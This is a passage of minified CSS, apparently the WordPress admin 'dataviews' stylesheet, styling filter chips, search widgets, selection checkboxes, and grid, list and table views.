svg,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover svg{fill:#1e1e1e}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values svg{fill:var(--wp-admin-theme-color)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values:hover{background:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:none}.dataviews-filters__search-widget-filter-combobox-list{border-top:1px solid #e0e0e0;max-height:184px;overflow:auto;padding:4px}.dataviews-filters__search-widget-filter-combobox-list .dataviews-filters__search-widget-filter-combobox-item-value [data-user-value]{font-weight:600}.dataviews-filters__search-widget-listbox{overflow:auto;padding:4px}.dataviews-filters__search-widget-listitem{align-items:center;border-radius:2px;box-sizing:border-box;cursor:default;display:flex;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;gap:8px;line-height:20px;min-height:32px;padding:4px 12px}.dataviews-filters__search-widget-listitem:last-child{margin-block-end:0}.dataviews-filters__search-widget-listitem:focus,.dataviews-filters__search-widget-listitem:hover,.dataviews-filters__search-widget-listitem[data-active-item]{background-color:var(--wp-admin-theme-color);color:#fff}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-description{color:#fff}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection{background:#fff;border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection.is-selected{background:var(--wp-admin-theme-color-darker-20,#183ad6);border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection{border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection.is-selected{background:var(--wp-admin-theme-color-darker-20,#183ad6);border-color:var(--wp-admin-theme-color-darker-20,#183ad6)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-description{color:#757575;display:block;font-size:12px;line-height:16px;overflow:hidden;text-overflow:ellipsis}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{border:1px solid #1e1e1e;border-radius:50%;height:24px;margin-right:12px;max-width:24px;min-width:24px;position:relative;transition:none;width:24px}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{height:16px;max-width:16px;min-width:16px;width:16px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{background-color:#fff;border:4px solid #fff;box-sizing:inherit;height:12px;left:50%;margin:0;position:absolute;top:50%;transform:translate(-50%,-50%);width:12px}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{height:8px;width:8px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked{background:var(--wp-admin-theme-color);border:none}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{margin:0;padding:0}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected{background:var(--wp-admin-theme-color,#3858e9);border-color:var(--wp-admin-theme-color,#3858e9)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{background-color:#fff;border:4px solid #fff;border-radius:50%;box-sizing:inherit;content:"";height:12px;left:50%;margin:0;position:absolute;top:50%;transform:translate(-50%,-50%);width:12px}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{height:8px;width:8px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{--checkbox-size:24px;border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;margin-right:12px;padding:6px 8px;transition:none}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{font-size:13px;line-height:normal}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-webkit-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-moz-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:-ms-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked::-ms-check{opacity:0}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{color:#fff;margin:-3px -5px}@media (min-width:782px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{margin:-4px 0 0 -5px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{content:"\f460";display:inline-block;float:left;font:normal 30px/1 dashicons;vertical-align:middle;width:16px;speak:none;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media (min-width:782px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{float:none;font-size:21px}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:disabled,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-disabled=true]{background:#f0f0f0;border-color:#ddd;cursor:default;opacity:1}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{background:#fff;color:#1e1e1e;height:var(--checkbox-size);margin:0;padding:0;position:relative;width:var(--checkbox-size)}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{--checkbox-size:16px}}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{transition:border-color .1s ease-in-out}}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected{background:var(--wp-admin-theme-color,#3858e9);border-color:var(--wp-admin-theme-color,#3858e9)}.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{--checkmark-size:var(--checkbox-size);fill:#fff;height:var(--checkmark-size);left:50%;position:absolute;top:50%;transform:translate(-50%,-50%);width:var(--checkmark-size)}@media (min-width:600px){.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{--checkmark-size:calc(var(--checkbox-size) + 4px)}}.dataviews-filters__search-widget-filter-combobox__wrapper{padding:8px;position:relative}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{transition:box-shadow .1s linear}}@media (min-width:600px){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{font-size:13px;line-height:normal}}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-moz-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:-ms-input-placeholder{color:#1e1e1e9e}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{display:block;font-size:16px;height:32px;margin-left:0;margin-right:0;padding:0 8px 0 32px;width:100%}@media (min-width:600px){.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{font-size:13px}}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{background:#fff;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::placeholder{color:#757575}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-cancel-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-decoration,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-decoration{-webkit-appearance:none}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon{align-items:center;bottom:0;display:flex;inset-inline-start:12px;justify-content:center;position:absolute;top:0;width:24px}.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon:dir(ltr){transform:scaleX(-1)}.dataviews-filters__container-visibility-toggle{flex-shrink:0;position:relative}.dataviews-filters-toggle__count{background:var(--wp-admin-theme-color,#3858e9);border-radius:8px;box-sizing:border-box;color:#fff;font-size:11px;height:16px;line-height:16px;min-width:16px;outline:var(--wp-admin-border-width-focus) solid #fff;padding:0 4px;position:absolute;right:0;text-align:center;top:0;transform:translate(50%,-50%)}.dataviews-search{width:fit-content}.dataviews-filters__user-input-widget{padding:16px}.dataviews-filters__user-input-widget .components-input-control__prefix{padding-left:8px}.dataviews-filters__search-widget-no-elements{align-items:center;display:flex;justify-content:center;padding:16px}.dataviews-footer{background-color:#fff;border-top:1px solid #f0f0f0;bottom:0;flex-shrink:0;left:0;padding:12px 48px;position:sticky}@media not (prefers-reduced-motion){.dataviews-footer{transition:padding .1s ease-out}}.dataviews-footer{z-index:2}@container (max-width: 430px){.dataviews-footer{padding:12px 24px}}@container (max-width: 560px){.dataviews-footer{flex-direction:column!important}.dataviews-footer .dataviews-bulk-actions-footer__container{width:100%}.dataviews-footer .dataviews-bulk-actions-footer__item-count{flex-grow:1}.dataviews-footer .dataviews-pagination{justify-content:space-between;width:100%}}.dataviews-pagination__page-select{font-size:11px;font-weight:500;text-transform:uppercase}@media (min-width:600px){.dataviews-pagination__page-select .components-select-control__input{font-size:11px!important;font-weight:500}}.dataviews-action-modal{z-index:1000001}.dataviews-picker-footer__bulk-selection{align-self:flex-start;height:32px}.dataviews-picker-footer__actions{align-self:flex-end}.dataviews-selection-checkbox{--checkbox-input-size:24px}@media (min-width:600px){.dataviews-selection-checkbox{--checkbox-input-size:16px}}.dataviews-selection-checkbox{flex-shrink:0;line-height:0}.dataviews-selection-checkbox .components-checkbox-control__input-container{margin:0}.dataviews-view-config{container-type:inline-size;font-size:13px;line-height:1.4;width:320px}.dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper{height:100%;overflow-y:scroll}.dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper .dataviews-view-config{width:auto}.dataviews-view-config__sort-direction .components-toggle-group-control-option-base{text-transform:uppercase}.dataviews-settings-section__title.dataviews-settings-section__title{font-size:15px;line-height:24px}.dataviews-settings-section__sidebar{grid-column:span 4}.dataviews-settings-section__content,.dataviews-settings-section__content>*{grid-column:span 8}.dataviews-settings-section__content .is-divided-in-two{display:contents}.dataviews-settings-section__content .is-divided-in-two>*{grid-column:span 4}.dataviews-settings-section:has(.dataviews-settings-section__content:empty){display:none}@container (max-width: 500px){.dataviews-settings-section.dataviews-settings-section{grid-template-columns:repeat(2,1fr)}.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__content,.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__sidebar{grid-column:span 2}}.dataviews-field-control__field{height:32px}.dataviews-field-control__actions{position:absolute;top:-9999em}.dataviews-field-control__actions.dataviews-field-control__actions{gap:4px}.dataviews-field-control__field.is-interacting .dataviews-field-control__actions,.dataviews-field-control__field:focus-within .dataviews-field-control__actions,.dataviews-field-control__field:hover .dataviews-field-control__actions{position:unset;top:unset}.dataviews-field-control__icon{display:flex;width:24px}.dataviews-field-control__label-sub-label-container{flex-grow:1}.dataviews-field-control__label{display:block}.dataviews-field-control__sub-label{color:#757575;font-size:11px;font-style:normal;margin-bottom:0;margin-top:8px}.dataviews-view-grid-items{container-type:inline-size;display:grid;gap:32px;grid-template-columns:repeat(auto-fill,minmax(230px,1fr));grid-template-rows:max-content;margin-bottom:auto;padding:0 48px 24px}@container (max-width: 430px){.dataviews-view-grid-items{padding-left:24px;padding-right:24px}}@media not (prefers-reduced-motion){.dataviews-view-grid-items{transition:padding .1s ease-out}}.dataviews-view-grid .dataviews-view-grid__card{height:100%;justify-content:flex-start;position:relative}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-actions{padding:8px 0 4px}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field{align-content:center;min-height:24px;overflow:hidden;text-align:start}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field--clickable{width:fit-content}.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{color:#1e1e1e}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after,.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.dataviews-view-grid .dataviews-view-grid__media{aspect-ratio:1/1;background-color:#fff;border-radius:4px;overflow:hidden;position:relative;width:100%}.dataviews-view-grid .dataviews-view-grid__media img{height:100%;object-fit:cover;width:100%}.dataviews-view-grid .dataviews-view-grid__media:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;left:0;pointer-events:none;position:absolute;top:0;width:100%}.dataviews-view-grid .dataviews-view-grid__fields{font-size:12px;line-height:16px;position:relative}.dataviews-view-grid .dataviews-view-grid__fields:not(:empty){padding:0 0 12px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field-value:not(:empty){line-height:20px;min-height:24px;padding-top:2px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field{align-items:center;min-height:24px}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-name{color:#757575;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:35%}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{overflow:hidden;text-overflow:ellipsis;white-space:nowrap;width:65%}.dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field:not(:has(.dataviews-view-grid__field-value:not(:empty))){display:none}.dataviews-view-grid .dataviews-view-grid__badge-fields:not(:empty){padding-bottom:12px}.dataviews-view-grid__field-value:empty,.dataviews-view-grid__field:empty{display:none}.dataviews-view-grid__card .dataviews-selection-checkbox{left:8px;opacity:0;position:absolute;top:-9999em;z-index:1}@media not (prefers-reduced-motion){.dataviews-view-grid__card .dataviews-selection-checkbox{transition:opacity .1s linear}}@media (hover:none){.dataviews-view-grid__card .dataviews-selection-checkbox{opacity:1;top:8px}}.dataviews-view-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-grid__card:hover .dataviews-selection-checkbox{opacity:1;top:8px}.dataviews-view-grid__card .dataviews-view-grid__media-actions{opacity:0;position:absolute;right:4px;top:4px}.dataviews-view-grid__card .dataviews-view-grid__media-actions .dataviews-all-actions-button{background-color:#fff}@media not (prefers-reduced-motion){.dataviews-view-grid__card .dataviews-view-grid__media-actions{transition:opacity .1s linear}}@media (hover:none){.dataviews-view-grid__card .dataviews-view-grid__media-actions{opacity:1;top:4px}}.dataviews-view-grid__card .dataviews-view-grid__media-actions:has(.dataviews-all-actions-button[aria-expanded=true]),.dataviews-view-grid__card:focus-within .dataviews-view-grid__media-actions,.dataviews-view-grid__card:hover .dataviews-view-grid__media-actions{opacity:1}.dataviews-view-grid__media--clickable{cursor:pointer}.dataviews-view-grid__group-header{color:#1e1e1e;container-type:inline-size;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 48px}@container (max-width: 430px){.dataviews-view-grid__group-header{padding-left:24px;padding-right:24px}}div.dataviews-view-list{list-style-type:none}.dataviews-view-list{margin:0 0 auto}.dataviews-view-list div[role=article],.dataviews-view-list div[role=row]{border-top:1px solid #f0f0f0;margin:0}.dataviews-view-list div[role=article] .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row] .dataviews-view-list__item-wrapper{box-sizing:border-box;padding:16px 24px;position:relative}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions{display:flex;flex:0 0 auto;gap:4px;white-space:nowrap;width:max-content}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions .components-button,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions .components-button{position:relative;z-index:1}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>div,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>div{height:24px}.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){flex:0;overflow:hidden;width:0}.dataviews-view-list div[role=article]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child){flex-basis:min-content;overflow:unset;width:auto}@media (hover:none){.dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){flex-basis:min-content;overflow:unset;width:auto}}.dataviews-view-list div[role=article].is-selected.is-selected,.dataviews-view-list div[role=article].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=article].is-selected.is-selected+div[role=row],.dataviews-view-list div[role=row].is-selected.is-selected,.dataviews-view-list div[role=row].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=row].is-selected.is-selected+div[role=row]{border-top:1px solid rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-view-list div[role=article]:not(.is-selected) .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected) .dataviews-view-list__title-field{color:#1e1e1e}.dataviews-view-list div[role=article]:not(.is-selected).is-hovered,.dataviews-view-list div[role=article]:not(.is-selected):focus-within,.dataviews-view-list div[role=article]:not(.is-selected):hover,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered,.dataviews-view-list div[role=row]:not(.is-selected):focus-within,.dataviews-view-list div[role=row]:not(.is-selected):hover{background-color:#f8f8f8;color:var(--wp-admin-theme-color)}.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__title-field{color:var(--wp-admin-theme-color)}.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper{background-color:rgba(var(--wp-admin-theme-color--rgb),.04);color:#1e1e1e}.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field{color:var(--wp-admin-theme-color)}.dataviews-view-list .dataviews-view-list__item{appearance:none;background:none;border:none;cursor:pointer;inset:0;padding:0;position:absolute;scroll-margin:8px 0;z-index:1}.dataviews-view-list .dataviews-view-list__item:focus-visible{outline:none}.dataviews-view-list .dataviews-view-list__item:focus-visible:before{border-radius:2px;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);content:"";inset:var(--wp-admin-border-width-focus);outline:2px solid #0000;position:absolute}.dataviews-view-list .dataviews-view-list__title-field{flex:1;line-height:24px;min-height:24px;overflow:hidden}.dataviews-view-list .dataviews-view-list__title-field:has(a,button){z-index:1}.dataviews-view-list .dataviews-view-list__media-wrapper{background-color:#fff;border-radius:4px;flex-shrink:0;height:52px;overflow:hidden;position:relative;width:52px}.dataviews-view-list .dataviews-view-list__media-wrapper img{height:100%;object-fit:cover;width:100%}.dataviews-view-list .dataviews-view-list__media-wrapper:after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;left:0;position:absolute;top:0;width:100%}.dataviews-view-list .dataviews-view-list__field-wrapper{flex-grow:1;min-height:52px}.dataviews-view-list .dataviews-view-list__fields{color:#757575;display:flex;flex-wrap:wrap;font-size:12px;gap:12px;row-gap:4px}.dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field:has(.dataviews-view-list__field-value:empty),.dataviews-view-list .dataviews-view-list__fields:empty{display:none}.dataviews-view-list .dataviews-view-list__fields .dataviews-view-list__field-value{align-items:center;display:flex;line-height:20px;min-height:24px}.dataviews-view-list+.dataviews-pagination{justify-content:space-between}.dataviews-view-list__group-header{color:#1e1e1e;font-size:15px;font-weight:500;margin:0 0 8px;padding:0 24px}.dataviews-view-table{border-collapse:collapse;border-color:inherit;color:#757575;margin-bottom:auto;position:relative;text-indent:0;width:100%}.dataviews-view-table th{color:#1e1e1e;font-size:13px;font-weight:400;text-align:left}.dataviews-view-table td,.dataviews-view-table th{padding:12px}.dataviews-view-table td.dataviews-view-table__actions-column,.dataviews-view-table th.dataviews-view-table__actions-column{text-align:right}.dataviews-view-table td.dataviews-view-table__actions-column--sticky,.dataviews-view-table th.dataviews-view-table__actions-column--sticky{background-color:#fff;position:sticky;right:0}.dataviews-view-table td.dataviews-view-table__actions-column--stuck:after,.dataviews-view-table th.dataviews-view-table__actions-column--stuck:after{background-color:#f0f0f0;bottom:0;content:"";display:block;left:0;position:absolute;top:0;width:1px}.dataviews-view-table td.dataviews-view-table__checkbox-column,.dataviews-view-table th.dataviews-view-table__checkbox-column{padding-right:0}.dataviews-view-table td.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper,.dataviews-view-table th.dataviews-view-table__checkbox-column .dataviews-view-table__cell-content-wrapper{max-width:auto;min-width:auto}.dataviews-view-table tr{border-top:1px solid #f0f0f0}.dataviews-view-table tr .dataviews-view-table-header-button{gap:4px}.dataviews-view-table tr td:first-child,.dataviews-view-table tr th:first-child{padding-left:48px}.dataviews-view-table tr td:first-child .dataviews-view-table-header-button,.dataviews-view-table tr th:first-child .dataviews-view-table-header-button{margin-left:-8px}.dataviews-view-table tr td:last-child,.dataviews-view-table tr th:last-child{padding-right:48px}.dataviews-view-table tr:last-child{border-bottom:0}.dataviews-view-table tr.is-hovered,.dataviews-view-table tr.is-hovered .dataviews-view-table__actions-column--sticky{background-color:#f8f8f8}.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input{opacity:0}.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:checked,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:focus,.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input:indeterminate{opacity:1}.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:0}.dataviews-view-table tr.is-hovered .components-checkbox-control__input,.dataviews-view-table tr.is-hovered .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:focus-within .components-checkbox-control__input,.dataviews-view-table tr:focus-within .dataviews-item-actions .components-button:not(.dataviews-all-actions-button),.dataviews-view-table tr:hover .components-checkbox-control__input,.dataviews-view-table tr:hover .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:1}@media (hover:none){.dataviews-view-table tr .components-checkbox-control__input.components-checkbox-control__input,.dataviews-view-table tr .dataviews-item-actions .components-button:not(.dataviews-all-actions-button){opacity:1}}.dataviews-view-table tr.is-selected{background-color:rgba(var(--wp-admin-theme-color--rgb),.04);color:#757575}.dataviews-view-table tr.is-selected,.dataviews-view-table tr.is-selected+tr{border-top:1px solid rgba(var(--wp-admin-theme-color--rgb),.12)}.dataviews-view-table tr.is-selected:hover{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.dataviews-view-table tr.is-selected .dataviews-view-table__actions-column--sticky{background-color:color-mix(in srgb,rgb(var(--wp-admin-theme-color--rgb)) 4%,#fff)}.dataviews-view-table tr.is-selected:hover .dataviews-view-table__actions-column--sticky{background-color:color-mix(in srgb,rgb(var(--wp-admin-theme-color--rgb)) 8%,#fff)}.dataviews-view-table thead{inset-block-start:0;position:sticky;z-index:1}.dataviews-view-table thead tr{border:0}.dataviews-view-table thead tr .components-checkbox-control__input.components-checkbox-control__input{opacity:1}.dataviews-view-table thead 